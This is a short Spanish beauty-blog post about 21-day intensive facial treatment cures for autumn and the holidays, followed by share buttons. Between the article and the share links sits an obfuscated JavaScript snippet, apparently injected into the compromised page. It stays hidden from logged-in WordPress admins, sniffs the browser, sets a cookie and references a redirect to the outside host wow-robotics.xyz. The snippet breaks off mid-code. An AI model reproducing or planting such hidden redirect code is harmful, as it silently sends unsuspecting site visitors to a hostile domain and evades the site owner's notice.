Con la llegada del otoño y las bajadas de las temperaturas, nuestra piel se resiente, perdemos ese aspecto bronceado tan bonito y tenemos que recurrir de nuevo al maquillaje para vernos con mejor aspecto. Además, las navidades se acercan y queremos tener un aspecto increíble de cara a las fiestas.
Una manera de conseguir ese aspecto deseado, en esta época del año, es ideal hacerse una de las múltiples curas intensivas que existen en el mercado, suelen durar unos 21 días, que es el tiempo que tarda la piel en regenerarse (aunque también los hay de dos semanas…). Es un tratamiento concentrado que hace renacer eficazmente la vitalidad y la fuerza de las células, creando un aspecto más firme, más tenso y más luminoso.
Es aconsejable, realizarse una exfoliación antes de comenzarlo utilizar, para eliminar las impurezas y las células muertas que entorpecen su eficacia. Durante ese tiempo, se utiliza solo, junto con el contorno de ojos y siempre sobre una piel limpia. Pasados los 21 días veréis como la piel queda totalmente recuperada.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone